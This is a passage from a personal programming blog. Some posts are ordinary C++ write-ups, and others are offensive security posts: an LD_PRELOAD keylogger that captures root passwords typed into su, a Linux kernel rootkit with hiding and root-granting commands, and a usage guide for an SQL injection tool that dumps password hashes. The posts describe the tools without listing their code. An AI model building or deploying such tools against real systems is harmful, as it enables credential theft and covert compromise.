Well, this was the first time I used <i>constexpr</i>, it was a nice experience. Implementing this using only TMP would be an extreme pain in the ass.Average Coderhttp://www.blogger.com/profile/11661490046382270751noreply@blogger.com3tag:blogger.com,1999:blog-6806868022885060269.post-80151909171544032892012-08-22T00:01:00.000-03:002013-11-24T13:12:55.161-03:00small integer C++ wrapperCurrently, I'm working on <a href="http://libtins.github.io/">libtins</a>, a library I'm developing with a friend. This library mainly contains classes that abstract <a href="http://libtins.sourceforge.net/index.php?page=tutorial#pdus">PDUs</a>, among other stuff. <br />
<br />
Since <i>PDU</i> classes are basically a wrapper over the protocol data units handled by the operating system, getters and setters are provided to enable the user to modify the fields in them. For example, there is a <i>TCP::data_offset</i> method which takes a value of type <i>uint8_t</i> and stores it in the <i>TCP</i> header's <i>data offset</i> field, which is 4 bit wide.<br />
<br />
While developing test units for this library, I would use some random number to initialize those fields, and then use the corresponding getter to check that the same number came out of it. A problem that I faced several times is that, there is no way to indicate that, while a setter method takes an <i>uint8_t</i>, the field being set internally is actually 4 bits wide, so any value larger than <i>15</i> would overflow, leading to the wrong number being stored. We really want to be able to detect those ugly errors.<br />
<br />
One solution would be to, on each setter, check whether the provided value is larger to <i>2 ** n - 1</i>, where <i>n</i> is the width of the field being set, and raise an exception if this condition is true. This has the drawback that every setter should make the appropriate check, using the appropriate power of 2, and throwing the same exception on each of them. This boilerplate solution already looks nasty.<br />
<br />
So I came with a better solution. C++'s implicit conversions can do magic for us. All we need is a class that wraps a value of<i> </i>an arbitrary bit width(up to 64 bits) that performs the corresponding checks while being initialized.<br />
<br />
The wrapper class is called <i>small_uint</i>(I thought about providing support for signed integral types, but finally dropped that option. It'd be easy to implement though). The class declaration is this one:<br />
<br />
<pre class="brush: c++;">template<size_t n> class small_uint;</pre>
<br />
The template non-type parameter <i>n</i> indicates the length, in bits, of the field. This class should be optimal, meaning that it should use to smallest integral type that can hold a value of that width.<br />
<br />
Internally, a compile time switch is performed to check which is the best underlying type, meaning, the type in which storing the field wastes less space. For example, for <i>7</i> bit <i>small_uints</i>, a <i>uint8_t </i>is used, while<i> 11</i> bit fields will be stored in a member variable of type <i>uint16_t</i>. This underlying type is typedef'ed as the <i>repr_type</i>.<br />
<br />
There is a constructor which takes a <i>repr_type</i> and raises an exception if it is larger than the <i>2 ** n - 1</i>, and a user-defined conversion to <i>repr_type</i> which simply returns the stored value. Since no arithmetic operations are performed with these integers, there are no such operators defined. It don't really know if defining them would make sense. If you wanted to perform such operations, you would just use standard arithmetic types. Only <i>operator==</i> and <i>operator!=</i> have been defined.<br />
<br />
I haven't used this class in <i>libtins</i> yet, but setters would probably look like this:<br />
<br />
<pre class="brush: c++;">void TCP::data_offset(small_uint<4> value) {
tcp_header_.data_offset = value;
}
</pre>
<br />
That way, a nice and clean solution can be achieved, avoiding boiler plate code. Note that internally, C++11 features could make a lot of things easier(such as <i>std::numeric_limits<>::max()</i> being <i>constexpr</i>, <i>std::conditional</i>, and <i>constexpr </i>functions), but I wanted to use only C++03 stuff, since the library is intended to work with the latter standard.<br />
<br />
The <i>small_uint</i> implementation can be found <a href="https://github.com/mfontanini/Programs-Scripts/blob/master/small_uint/small_uint.h">here</a>. Average Coderhttp://www.blogger.com/profile/11661490046382270751noreply@blogger.com0tag:blogger.com,1999:blog-6806868022885060269.post-52411924014108311192012-07-02T18:52:00.000-03:002012-07-02T20:11:04.984-03:00Python style range loops in C++Python is a nice scripting language which has some really flexible characteristics. One thing I like about it is the integer range for-loops that can be achieved using the built-in function <i>range</i>:<br />
<pre class="brush: python">for i in range(10):
# Insert clever statement below
print i
</pre>
Doing that same thing in C++ would require some for loop like the one below:<br />
<pre class="brush: c++">for(size_t i(0); i < 10; ++i)
std::cout << i << std::endl;
</pre>
Which is larger and less clearer(well, not that much :D). So I created a simple wrapper to achieve the same thing in C++, using C++11's range-based for loops. The wrapper <b>can be found <a href="https://github.com/mfontanini/Programs-Scripts/blob/master/c%2B%2B_stuff/range.cpp">here</a>.</b><br />
<br />
In order to use ranges, a function named <i>range</i> should be used, which contains these overloads:<br />
<pre class="brush: c++">// Returns a range_wrapper<T> containing the range [start, end)
template<class T>
range_wrapper<T> range(const T &start, const T &end) {
return {start, end};
}
// Returns a range_wrapper<T> containing the range [T(), end)
template<class T>
range_wrapper<T> range(const T &end) {
return {T(), end};
}
</pre>
<i>range_wrapper<></i> is a simple wrapper that defines <i>begin()</i> and <i>end()</i>, both return a <i>range_iterator</i>, the former one pointing to the beginning of the range and the latter to the end. The <i>range_iterator<></i> class template is just a wrapper over the template parameter, and defines all of the forward iterator required member functions/typedefs. The prefix/suffix increment operators apply the same operator on the wrapped object, while the dereference operator returns it.<br />
<br />
Since range-based for loops require the iterated sequence to define <i>begin()</i> and <i>end()</i> or that the global <i>std::begin()</i>/<i>end()</i> functions are defined for the given type, using the <i>range_wrapper<></i> class template in these for loops is perfectly valid.<br />
<br />
Using this wrapper, that code can be reduced to this:<br />
<pre class="brush: c++">// Prints numbers in range [0, 10)
for(auto item : range(10))
std::cout << item << std::endl;
</pre>
Using the first overload, which takes the start and end of the range, we can indicate the starting number.<br />
<pre class="brush: c++">// Prints numbers in range [5, 15)
for(auto item : range(5, 15))
std::cout << item << std::endl;
</pre>
Note that <i>range</i> is a template function, so it could be adapted to perform range iteration through other types(<i>std::string</i> comes to my mind right now). <br />
<br />
This same thing can be achieved using<i> boost::irange</i>, but hey, I was bored and wanted to implement it myself.Average Coderhttp://www.blogger.com/profile/11661490046382270751noreply@blogger.com3tag:blogger.com,1999:blog-6806868022885060269.post-849093080114945302012-04-06T01:51:00.000-03:002012-06-21T13:13:12.989-03:00Python wrapper in C++11This is a post about a wrapper for python scripts I developed using <i>C++11. </i>This was the first time I used <i>variadic templates</i>, and i must say it's an amazing feature in this new C++ standard! It's great to have a type-safe way to use variable arguments.<br />
<br />
The whole wrapper is inside the <i>Python</i> namespace. Before you start using anything inside it, you should call <i>Python::initialize()</i>, which initializes the Python API.<br />
<br />
The <i>Python::Object</i> class provides an abstraction of a python object. <i>Python::Objects </i>wrap a<i> PyObject*</i>(which is the<i> </i>abstraction of a Python object provided by its API), inside a <i>std::shared_ptr</i>. On their destructor, a call to Py_DECREF is performed, so the underlying <i>PyObject*</i> will get free'd appropriately. <br />
<br />
In order to load a python script, a static method <i>Python::Object::from_script(const std::string &)</i> should be called, which returns a <i>Python::Object</i> that represents that script. The name of the script(with or without the ".py" extension) should be passed as argument:<br />
<br />
<pre class="brush: c++">#include "pywrapper.h"
/* ... */
Python::Object script = Python::Object::from_script("test.py"); //could be test also</pre>
<br />
After that sentence, the "script" variable will have loaded the "test.py" script, located in the current working directory. <br />
<br />
Now you can call functions defined in that script using the Python::<i>Object::call_function </i>method, which has this signatures:<br />
<br />
<br />
<pre class="brush: c++">
// Variadic template arguments version
template<typename... Args>
Python::Object call_function(const std::string &name, const Args... &args);
// No arguments version
Python::Object call_function(const std::string &name);</pre>
<br />
<br />
This method takes the name of the function as the first argument, followed by 0 or more arguments. These arguments will be implicitly converted to <i>PyObject</i> pointers, which can be used as arguments using the Python API. So far, you can use arguments of these types:<br />
<ul>
<li>std::string</li>
<li>const char *</li>
<li>Any integral type(for which <a href="http://en.cppreference.com/w/cpp/types/is_integral">std::is_integral</a> is true). </li>
<li>bool</li>
<li>double</li>
<li>std::vector </li>
<li>std::list</li>
<li>std::map</li>
</ul>
Both <i>std::vector</i> and <i>std::list</i> will be converted to a Python <i>list</i>, with the exception of <i>std::vector<char></i>, which will be converted to a bytearray. The <i>std::map</i> objects will be converted to Python <i>dict</i>s.<br />
<br />
The <i>Script::call_function</i> method returns the Python return value wrapped in a <i>Python::Object</i>. Note that the objects stored in the <i>std::vector</i>s and <i>std::list</i>s must also be convertible to <i>PyObject </i>pointers(must be listed above).<br />
<br />
In case you want to use the return value, you might want to use <i>Python::Object::convert</i> which will convert the wrapped PyObject* into one of the same C++ types mentioned above, and also <i>std::tuple</i>.<br />
<br />
As an example, i used this python script:<br />
<br />
<pre class="brush: python"> #!/usr/bin/python
def foo(a, b, c, d, e):
print '{0} - {1} - {2} - {3} - {4}'.format(
a, str(b), str(c), repr(d), repr(e)
)
def int_fun():
return 12
def list_fun():
return [1,2,3,4,561,2]
def dict_fun():
return {
'bar' : 1,
'foo' : 15
}
def tuple_fun():
return (1, 'foo', 15.5)
def bool_fun():
return False
x = 1598
</pre>
<br />
It's just a bunch of functions that take/return different types of arguments. My C++ code that calls these functions is this one:<br />
<br />
<pre class="brush: c++">#include <string>
#include <vector>
#include <iostream>
#include <stdexcept>
#include <iomanip>
#include <map>
#include <tuple>
#include "pywrapper.h"
int main() {
Python::initialize();
Python::Object script(Python::Object::from_script("test_script.py"));
std::vector<int> v({2,6,5});
std::map<std::string, int> dict({
{"bleh", 1},
{"foofoo", 10}
});
std::cout << "Calling foo:\n";
script.call_function("foo", "a string", true, 10, v, dict);
// Int test
std::cout << "Calling int_fun:\n";
Python::Object ptr = script.call_function("int_fun");
int num;
if(ptr.convert(num))
std::cout << "Result: " << num << '\n';
else
std::cout << "Long conversion failed\n";
// List test
std::vector<int> lst;
std::cout << "Calling list_fun:\n";
ptr = script.call_function("list_fun");
if(ptr.convert(lst)) {
std::cout << "List size: " << lst.size() << '\n';
for(auto it(lst.begin()); it != lst.end(); ++it)
std::cout << *it << " ";
std::cout << '\n';
}
else
std::cout << "List conversion failed\n";
// Dict test
std::map<std::string, int> mp;
std::cout << "Calling dict_fun:\n";
ptr = script.call_function("dict_fun");
if(ptr.convert(mp)) {
std::cout << "Map size: " << mp.size() << '\n';
for(auto it(mp.begin()); it != mp.end(); ++it)
std::cout << it->first << " -> " << it->second << '\n';
}
else
std::cout << "Map conversion failed\n";
// Tuple test
std::cout << "Calling tuple_fun:\n";
ptr = script.call_function("tuple_fun");
std::tuple<int, std::string, double> tup;
if(ptr.convert(tup)) {
std::cout << std::get<0>(tup) << "\n";
std::cout << std::get<1>(tup) << "\n";
std::cout << std::get<2>(tup) << "\n";
}
else
std::cout << "Tuple conversion failed\n";
bool bool_val;
std::cout << "Calling bool_fun:\n";
ptr = script.call_function("bool_fun");
if(ptr.convert(bool_val))
std::cout << "Result: " << std::boolalpha << bool_val << '\n';
else
std::cout << "Long conversion failed\n";
// Get attr test
std::cout << "Retrieving 'x' variable:\n";
try {
ptr = script.get_attr("x");
if(ptr.convert(num))
std::cout << "X == " << num << '\n';
} catch(std::runtime_error &ex) {
std::cout << ex.what() << '\n';
}
}
</pre>
<br />
In the last code senteces, the <i>Python::Object::get_attr</i> method is used, which returns a <i>Python::Object</i> containing the contents of the script attribute which has this method argument's name. After executing this application, this output is produced:<br />
<br />
<pre class="brush: bash">Calling foo:
a string - True - 10 - [2, 6, 5] - {'bleh': 1, 'foofoo': 10}
Calling int_fun:
Result: 12
Calling list_fun:
List size: 6
1 2 3 4 561 2
Calling dict_fun:
Map size: 2
bar -> 1
foo -> 15
Calling tuple_fun:
1
foo
15.5
Calling bool_fun:
Result: false
Retrieving 'x' variable:
X == 1598
</pre>
<br />
As you can see, this class allows a type-safe variable argument interface for calling Python functions and retrieving defined attributes in scripts.<br />
<br />
You can get the header and source file <a href="https://github.com/mfontanini/Programs-Scripts/tree/master/pywrapper">here</a>.<br />
<br />
In order to compile this application, using <i>gcc</i>, remember to use the <i>-std=c++0x</i> and <i>-lpython2.7</i> arguments. <br />
<br />
I hope you find this wrapper useful!<br />
<br />Average Coderhttp://www.blogger.com/profile/11661490046382270751noreply@blogger.com2tag:blogger.com,1999:blog-6806868022885060269.post-23302993508905384802012-03-03T11:20:00.000-03:002012-06-21T13:22:19.348-03:00Configuration file parser - C++I'm working on a project developed in C++, which can be configured using several parameters on runtime. Since there were lots of options, i decided to include a configuration file in which the user could assign a value to each defined attribute. This is an example of the file's structure:<br />
<br />
<pre class="brush:bash">
# Default yasps configuration
# By default the server is bound to 0.0.0.0:7517
# --------------------------------------------------
# Server configuration
bind_address=0.0.0.0
port=7517
# Authentication configuration
# Unauthenticated connections are allowed by default
noauth=1
username=user
password=pass123</pre>
<br />
As you can see, the options require different data types. Therefore, i needed a generic algorithm that could parse the file and interpret the given values as strings, integer, bools or whatever data type i indicated, and assign them to the corresponding attribute. To achieve this, i created a small class using template parameters.<br />
<br />
The ConfigurationParser is extremely simple to use. There is one method which adds an attribute and associates it with a pointer. Whenever that attribute name is found on the file, the parser will try to interpret the given value and store it in that pointer. The method has the following signature:<br />
<br />
<pre class="brush:c++">template<class T>
void add_option(const std::string &name, T *value_ptr); </pre>
<br />
The only constraint imposed on the type <i>T</i> is that the input operator(operator>>) is defined. As long as you use either primitive types or std::string(s), you don't have to implement anything else. In case you have created a certain class that can be deserialized, you would have to implement this operator. <br />
<br />
Once every attribute has been set, you have to call the ConfigurationParser::parse method, using the configuration file name as the argument. This is the signature of this method:<br />
<br />
<pre class="brush:c++">void parse(const std::string &file_name);</pre>
<br />
This method can raise different exceptions, depending on what problem was encountered:<br />
<ul>
<li>std::ios_base::failure if an error occurred when opening the file.</li>
<li>ConfigurationParser::NoValueGivenError if no value was set for an attribute that appeared on the configuration file. e.g. <i>bleh=</i> . There should be some value after the '=' character.</li>
<li>ConfigurationParser::InvalidValueError if there was a data type missmatch when trying to interpret an attribute's value. This can happen if, for example, an attribute expects an integer value, however, a string value is given.</li>
<li>ConfigurationParser::InvalidOptionError is raised if an attribute which was not registered using ConfigurationParser::add_option appeared in the configuration file.</li>
</ul>
No that the ConfigurationParser class is included inside the CPPUtils namespace. Finally, here is an example, taken from the project i'm working on:<br />
<br />
<pre class="brush:c++">
#include <iostream>
#include <string>
#include "configparser.h"
using CPPUtils::ConfigurationParser;
class Configuration {
public:
void load(const std::string &file_name) {
ConfigurationParser parser;
parser.add_option("username", &config_username);
parser.add_option("password", &config_password);
parser.add_option("bind_address", &address);
parser.add_option("log_file", &log_filename);
parser.add_option("port", &port);
parser.add_option("noauth", &config_allow_no_auth);
parser.add_option("enable_logging", &config_enable_logging);
try {
parser.parse(file_name);
}
catch(std::ios_base::failure &ex) {
std::cerr << "[ERROR] Error opening " << file_name << "(" << ex.what() << ").\n";
}
catch(ConfigurationParser::NoValueGivenError &ex) {
std::cerr << "[ERROR] Parse error: No value give for " << ex.what() << " attribute.\n";
}
catch(ConfigurationParser::InvalidValueError &ex) {
std::cerr << "[ERROR] Parse error: Invalid value for attribute " << ex.what() << "\n";
}
catch(ConfigurationParser::InvalidOptionError &ex) {
std::cerr << "[ERROR] Parse error: Could not find a valid attribute in \"" << ex.what() << "\"\n";;
}
}
private:
std::string config_username, config_password, address, log_filename;
short port;
bool config_allow_no_auth, config_enable_logging;
};
</pre>
<br />
That's all. You can download the header file <a href="https://github.com/mfontanini/libcpputils/blob/master/include/configparser.h">here</a>, the source file <a href="https://github.com/mfontanini/libcpputils/blob/master/src/configparser.cpp">here</a> and the only header dependency, <a href="https://github.com/mfontanini/libcpputils/blob/master/include/exception.h">exception.h</a>. The class is licensed under GPLv3, so feel free to use it.Average Coderhttp://www.blogger.com/profile/11661490046382270751noreply@blogger.com0tag:blogger.com,1999:blog-6806868022885060269.post-29723354557468510932012-02-09T00:24:00.001-03:002012-11-03T14:41:21.674-03:00Linux terminal keylogger in userspace<div style="text-align: center;">
<span style="font-size: large;">Introduction </span></div>
<br />
Sometimes, during a pentest, you have access to a certain system user's password, can actually successfully login on the system(using <i>ssh</i> for example), but cannot gain root privileges. This can be caused due to the fact that the user is not a <i>sudoer</i>, nor is <i>sudo </i>installed on the system, and of course, that the password is not the same as the <i>root</i> user.<br />
<br />
However, this user might actually use "<b>su"</b> to become the superuser. In this case, we have access to his settings and configuration files, located in his <i>home</i> directory, which can be modified and used to obtain the <i>root</i>'s password.<br />
<br />
There are several environment variables that <i>libc</i> uses to modify an application's behaviour when launching it. Among many, there is one that allows the user to load one or more arbitrary shared objects right before launching a certain application. This environment variable is named <b>LD_PRELOAD</b>.<br />
<br />
<div style="text-align: center;">
<span style="font-size: large;">The LD_PRELOAD environment variable</span> </div>
<br />
Using <b>LD_PRELOAD</b>, a user can launch an application and force it to load any shared object he wants. So how can we take advantage of <b>LD_PRELOAD</b>? On GNU/Linux, programs are usually compiled dynamically, allowing the symbols used in it to be loaded when the application is launched. When the application is executed, the shared objects that contain the symbols used are loaded, and those symbol's addresses are resolved. Every reference to the loaded symbols will use those addresses.<br />
<br />
Fortunately for us, this symbol loading is done <b>after</b> the shared objects pointed by <b>LD_PRELOAD </b>are loaded. Therefore, if we compile a shared object which contains a function that has the same signature(name + return type + arguments) as one that another application expects to resolve, it will use <b>ours</b> instead of the "original" one, allowing us to execute arbitrary code.<br />
<br />
Okay, so now we can inject arbitrary code, now how can we use this technique? We could hook the <i>read</i> system call, then wait for the user to launch <b>su</b>. Our object would be loaded and we would be able to read the data typed by the user, in which we will eventually find the <i>root</i>'s password.<br />
<br />
However, we cannot do this, since <i>su</i> is a <i>suid</i> file. The <i>libc</i> does not allow us to execute an application that has the <i>suid</i> bit set, and instruct it to load our library on startup. If this was possible, we could execute <i>ping</i>, for example, make our shared object load and drop a <i>root</i> shell right away. Therefore <b>LD_PRELOAD</b> + <i>suid </i>binary is not a possibility.<br />
<br />
Anyhow, we can use another approach. We can hook the <i>execve</i> syscall, which is used by bash to execute commands, and modify its behaviour. This way we could execute whatever we want, no matter what <i>bash</i> is trying to execute.<br />
<br />
<div style="text-align: center;">
<span style="font-size: large;">The actual keylogger</span></div>
<br />
So what i did was to instead of trying to hook the <i>read</i> syscall and log every byte read by the application, <i></i>was to hook <i>execve and </i><i>fork()</i> right before calling the original <i>execve</i> and log the data that is written to <i>stdin</i>(which should be read by the <i>execve</i>'d application) into a file. This way, no matter what was being executed, <i>suid</i> files or regular, we can still read stdin, since we are not hooking the syscall on the executed application, but on <i>bash</i>. My <i>execve</i> is basically a proxy that logs everything that is written to stdin before it is sent to the child process.<br />
<br />
Finally, we can read every byte written by the user, but we require <i>bash </i>to load our shared object using the <b>LD_PRELOAD</b> environment variable. We can achieve this by editing(or creating) the <i>~/.pam_environment</i> file and inserting this line into it:<br />
<blockquote class="tr_bq">
LD_PRELOAD=FullPathToTheSharedObject</blockquote>
In my case, i have inserted the line:<br />
<blockquote class="tr_bq">
LD_PRELOAD=/home/matias/key.so</blockquote>
After a restart(or logout performed by the user) that environment variable will be set, loading our shared object everytime bash starts.<br />
<br />
Note that we can't edit the <i>.bashrc</i> file, since this file is interpreted by <i>bash</i> after the process is created. What we require is a way of editting the <b>LD_PRELOAD</b> environment variable <b>before</b> <i>bash</i> is started, which can be achieved through <i>~/.pam_environment</i>. <br />
<br />
The source code of this PoC is available here <a href="https://github.com/mfontanini/Programs-Scripts/tree/master/keylogger">https://github.com/mfontanini/Programs-Scripts/tree/master/keylogger</a>. Download both <i>keylogger.c</i> and <i>Makefile</i>. In order to compile, just execute <i>make</i>, <i>keylogger.so</i> will be the object generated.<br />
<br />
This is a screenshot of the keylogger, storing the password and commands typed by the user when executing <i>su</i>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlvR9ShHpV8H-2ZNUP8c-7qaQ4YXQvR0ISU715Hp2355GCJdJ6waVnJc4A2l-XWszcm-6Mmw6qn0L_J73dWkhkw_2z5AuUUI5rziL2XtWjMAVVLXSyS7yAaPVNM9odj1Wq_zxQC8mQLIxs/s1600/keylogger.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlvR9ShHpV8H-2ZNUP8c-7qaQ4YXQvR0ISU715Hp2355GCJdJ6waVnJc4A2l-XWszcm-6Mmw6qn0L_J73dWkhkw_2z5AuUUI5rziL2XtWjMAVVLXSyS7yAaPVNM9odj1Wq_zxQC8mQLIxs/s400/keylogger.png" width="400" /></a></div>
<br />
<br />
By default the log file is located in <i>/tmp</i>/output. If you want to change it, just edit the sourcecode and edit the <i>OUTPUT_FILE </i>define, or add a CFLAG to the Makefile:<br />
<blockquote class="tr_bq">
CFLAGS=-c -Wall -O3 -fPIC -DOUTPUT_FILE=/home/somebody/blah.log</blockquote>
There is an array named <i>injected_files</i> which contains a list of all the files that will be "logged" when executed. This is used because there are lots of applications that we don't want to log. This array contains <i>/bin/su </i>and <i>/usr/bin/ssh</i>. Feel free to add any other application that you want to keylog.<br />
<br />
Finally, there's a code snippet at the end of the file which removes the value of the <b>LD_PRELOAD</b> variable right after the shared object is loaded. This is just a mechanism to hide our keylogger. Otherwise, if the user executed <i>"echo $LD_PRELOAD"</i> while using bash, he would see the location of our keylogger as the output. <b>Note that by removing the LD_PRELOAD variable, child processes will not load our shared object, therefore in a GUI environment, where the first application that is executed is gnome-terminal or other graphical terminal, and this application is the one that executes bash, the shared object will be loaded by gnome-terminal, but won't be loaded by bash.</b> Therefore, if you plan on using this keylogger on a <i>GUI</i> environment, remove the body of the "void init(void)" function, located at the end of <i>keylogger.c.</i><br />
<br />
Hope you find it useful!Average Coderhttp://www.blogger.com/profile/11661490046382270751noreply@blogger.com15tag:blogger.com,1999:blog-6806868022885060269.post-10479017326506637112011-12-04T16:49:00.001-03:002012-10-26T14:42:41.781-03:00Linux rootkit implementationThis is a rootkit i developed some time ago for educational purposes. It has the ability to hide itself from <i>lsmod</i>, hide processes, tcp connections, logged in users and to give uid 0 to any running process. The rootkit <strike><b>does not work on linux kernel >= 3.0</b>.</strike> now works on Linux Kernels >= 3.0 thanks to <a href="https://github.com/kholia">Dhiru Kholia</a>, who ported it. He also made the proper fixes for the rootkit to compile on CentOS. The rootkit has been successfully tested on kernels >= 2.6.26.<br />
<br />
The hiding is performed through file system function hooking. On Linux, every fs driver provides functions to open, read, write and perform operations with files and directories. This functions are stored in a struct <i>file_operations</i>, stored inside every <i>inode</i>. Therefore, every <i>file_operations</i> contains a pointer to the open, read, write(and many other) functions which will be called whenever a user tries to execute those actions on a filesystem object.<br />
<br />
So what i did was to retrieve a certain <i>inode</i> and modify the pointer to its read function, replacing it with my own function. In this new function, filtering on the input was performed, in order to remove the entries i wanted to hide.<br />
<br />
Let's take for example the connection hiding mechanism. <i>netstat</i> takes tcp connections information from a virtual file named <i>/proc/net/tcp</i>. This file contains one entry per line, each one indicating source and destination port, source and destination address and more information about each open connection. In order to hide a certain connection, i replaced the default read function with my own, in which i read entries on that file and skipped those containing the port i needed to hide.<br />
<br />
In order to give orders to the rootkit, i used the same mechanism. I added a write function pointer to the file <i>/proc/buddyinfo</i>, which by default has no write permissions. So after hooking that function, whenever any user writes something to that virtual file, the rootkit will read what was wrote and execute actions based on the input. The commands it supports are the next ones:<br />
<ul>
<li>hide/show. This commands hide/show the rootkit from <i>lsmod</i>(actually from <i>/proc/modules</i>).</li>
<li>hsport PORT/ssport PORT. Hides(hsport) connection which have PORT as their source port, or "unhides it"(ssport) if it was previously hidden.</li>
<li>hdport PORT/sdport PORT. Same as above but using destination port instead of source.</li>
<li>hpid PID/spid PID. Hides or "unhides" a process that has PID as its pid. This is done by hooking the<i> /proc</i> readdir pointer.</li>
<li>huser USER/suser USER. This commands hide or "unhide" a logged in user, so that <i>who</i> or other similar commands won't indicate USER is logged in the system. This is done by hooking <i>/var/run/utmp</i>. </li>
<li>root PID. This makes the process identified by PID to contain uid 0 and gid 0. This is kind of dirty but works well; the credentials struct from the <i>init</i> process is copied to the process identified by PID.</li>
</ul>
This is a screenshot showing how the rootkit works, hiding a user, a process, the ssh socket and making the <i>bash</i> process gain root privileges:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgV00h3gHj_QeEC3eqYhazD4lsx9gwJoFVdVXP54MiQ6NZo7QkuaW9tvm7e0nTngBA2hKgKbdthsuf9hAYKeq0wFbXLv2vhPdY68oLfACjn_KTSnFnV3CiIbtQ5cSZi3cjL3ZohsUCOlCxh/s1600/rootkit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="620" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgV00h3gHj_QeEC3eqYhazD4lsx9gwJoFVdVXP54MiQ6NZo7QkuaW9tvm7e0nTngBA2hKgKbdthsuf9hAYKeq0wFbXLv2vhPdY68oLfACjn_KTSnFnV3CiIbtQ5cSZi3cjL3ZohsUCOlCxh/s640/rootkit.png" width="640" /></a></div>
<br />
You can get the source code <a href="https://github.com/mfontanini/Programs-Scripts/tree/master/rootkit">https://github.com/mfontanini/Programs-Scripts/tree/master/rootkit</a>. In order to compile it, you require your kernel's headers(on debian-based distributions, this can be found on the package linux-headers-2.6.X.X, where X depend on your kernel version). Download both the Makefile and the source file, and then just execute:<br />
<blockquote class="tr_bq">
make<br />
insmod rootkit.ko </blockquote>
That's all. Hope you find it useful!Average Coderhttp://www.blogger.com/profile/11661490046382270751noreply@blogger.com8tag:blogger.com,1999:blog-6806868022885060269.post-65242257032157547312011-10-11T17:58:00.001-03:002011-12-01T16:59:05.207-03:00The Mole - SQL Injection exploitation toolThe Mole is a command line interface SQL Injection exploitation tool. <br />
This application, developed in python, is able to exploit both union-based and blind boolean-based injections. <br />
<br />
Every action The Mole can execute is triggered by a specific command. All this application requires in order to exploit a SQL Injection is the URL(including the parameters) and a needle(a string) that appears in the server's response whenever the injection parameter generates a valid query, and does not appear otherwise. Note that the vulnerable parameter must be the <b>last one</b> on the URL. <br />
<br />
So far, The Mole supports Mysql, Mssql and Postgres, but we expect to include other DBMSs.<br />
<br />
<b>Edit: to read an updated and more detailed tutorial, please visit: <a href="http://themole.nasel.com.ar/?q=tutorial">http://themole.nasel.com.ar/?q=tutorial</a></b>.<br />
<br />
<br />
<div style="text-align: center;">
<b>Executing The Mole</b></div>
<br />
In order to execute The Mole, you require only python3 and python3-lxml. Once you execute it, a shell prompt will be printed, waiting for commands. You can additionally use some program arguments:<br />
<br />
<blockquote>
-u URL: Use this to set the URL which contains the vulnerability. This is the same as using the "url" command.<br />
<br />
-n NEEDLE: Use this to set the needle to be found in the requested page. This is the same as using the "needle" command.<br />
<br />
-t THREADS: Use THREADS threads while performing queries. </blockquote>
<br />
<div style="text-align: center;">
<b>Commands</b></div>
<div style="text-align: center;">
<br /></div>
This is a list of all supported commands:<br />
<blockquote>
- url [URL]: Gets/sets the URL. This can also be provided as an argument to the application, using the "-u" parameter.<br />
<br />
- needle [NEEDLE]: Gets/sets the NEEDLE. This can also be provided as an argument to the application, using the "-n" parameter.<br />
<br />
- dbinfo: Fetch current user name, database name and DBMS version.<br />
<br />
- schemas: Fetchs the schemas(databases) from the server. The results obtained will be cached, so further calls to this command will return the cached entries. See "fetch" command. <br />
<br />
- tables <SCHEMA>: Fetchs the tables for the schema SCHEMA. The results obtained will be cached, so further calls to this command will return the cached entries. See "fetch" command. <br />
e.g: "tables mysql"<br />
<br />
- columns <SCHEMA> <TABLE><schema></schema><schema></schema>: Fetchs the columns for the table TABLE, in the schema SCHEMA. The results obtained will be cached, so further calls to this command will return the cached entries. See "fetch" command.<br />
e.g: "columns mysql user"<br />
<br />
- query <SCHEMA> <TABLE><schema></schema> COLUMN1[,COLUMN2[,COLUMN3[...]]] [where COND]:<br />
Perform a query to fetch every column given, using the table TABLE located in the schema SCHEMA. A "where condition" can be given. Note that The Mole will take care of any string conversions required on the condition. Therefore, you can use string literals(using single quotes) even if the server escapes them. Note that no caching is performed when executing this command.<br />
e.g: query mysql user User,Password where User = 'root'<br />
<br />
- fetch <schemas|tables|columns> [args]: This command calls schemas, tables or columns commands depending on the arguments given, forcing them to refetch entries, even if they have already been dumped. This is useful when, after having stopped a query in the middle of it, you want to fetch all of the results and not just those that you were able to dump before stopping it.<br />e.g: "fetch columns mysql user"<br /><br />- cookie [COOKIE]: Gets/sets a cookie to be sent in each HTTP request's headers.<br /><br />- mode <union|blind><union|blind></union|blind></union|blind></schemas|tables|columns><union|blind><schemas|tables|columns><union|blind><union|blind>: Sets the SQL Injection exploitation method. By <br />default, union mode is used. If the injection cannot be exploited using<br />this mode, change it to blind using "mode blind" and try again. Nothing else has to be configured to go from union to blind mode, as long as you have already set the URL and needle.<br /><br />- prefix [PREFIX]: Gets/sets the prefix for each request. The prefix <br />will be appended to the URL's vulnerable parameter on each request.<br /><br />- suffix [SUFFIX]: Gets/sets the suffix for each request. The suffix <br />will be appended after the injection code on the URL's vulnerable parameter.<br /><br />- verbose </union|blind></union|blind></schemas|tables|columns><on|off><schemas|tables|columns><union|blind><union|blind><on|off><on|off>: Sets the verbose mode on and off. When this mode is on, each request's parameters will be printed out.<br /><br />- output <pretty|plain><pretty|plain></pretty|plain></pretty|plain></on|off></on|off></union|blind></union|blind></schemas|tables|columns><pretty|plain><schemas|tables|columns><union|blind><union|blind><on|off><on|off><pretty|plain><pretty|plain>: Sets the output style. When pretty output mode is enabled(this is the default), queries result will be printed on a <br />tidy box, using column names and each row will be aligned. The drawback is that this method requires the whole query to finish before printing results, so you might want to use "plain" output if you seek immediate results. In contrast, plain mode prints each result as soon as it is recovered.<br />e.g: <br />Pretty output might print results like this:<br /><br />+------------------------------------------------------------------------------------------+<br /> | User | Password |<br />+------------------------------------------------------------------------------------------+<br /> | blabla | *2B0DDEE3597240B595689260B53D411F515B806D |<br /> | foobar | *641B2485F1789F7A6BEE986648B83A899D96793B |<br />+------------------------------------------------------------------------------------------+<br /><br />While plain output will print them like this:<br /><br />User, Password:<br />blabla, *2B0DDEE3597240B595689260B53D411F515B806D<br />foobar, *641B2485F1789F7A6BEE986648B83A899D96793B<br /><br />- timeout [TIMEOUT]: Gets/Sets the timeout between requests. Use this if the server contains some kind of IDS system that returns HTTP error when executing lots of requests in a short amount of time. Note that TIMEOUT can be a floating point number, so you can set 